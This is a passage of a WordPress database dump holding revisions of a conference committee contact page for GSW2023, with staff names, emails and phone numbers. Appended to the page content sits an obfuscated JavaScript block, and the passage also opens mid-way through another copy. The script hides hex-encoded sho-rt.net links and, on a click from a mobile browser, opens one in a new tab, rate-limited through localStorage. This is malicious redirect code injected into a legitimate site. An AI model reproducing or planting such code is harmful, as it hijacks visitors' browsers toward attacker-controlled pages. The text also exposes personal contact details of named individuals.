Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 13:31:41','2023-06-27 13:31:41','',4849,'https://gsw2023.com/?p=4937',0,'revision','',0),
(4938,4,'2023-06-27 13:36:23','2023-06-27 13:36:23','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\">nashwa.elbendary@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871415968{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687871444230{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 13:36:23','2023-06-27 13:36:23','',4849,'https://gsw2023.com/?p=4938',0,'revision','',0),
(4939,4,'2023-06-27 13:43:23','2023-06-27 13:43:23','','Businessman avatar icon in colors.','Businessman avatar icon in colors.','inherit','open','closed','','businessman-avatar-icon-in-colors','','','2023-06-27 13:43:23','2023-06-27 13:43:23','',4849,'https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg',0,'attachment','image/jpeg',0),
(4940,4,'2023-06-27 13:45:14','2023-06-27 13:45:14','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\">nashwa.elbendary@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 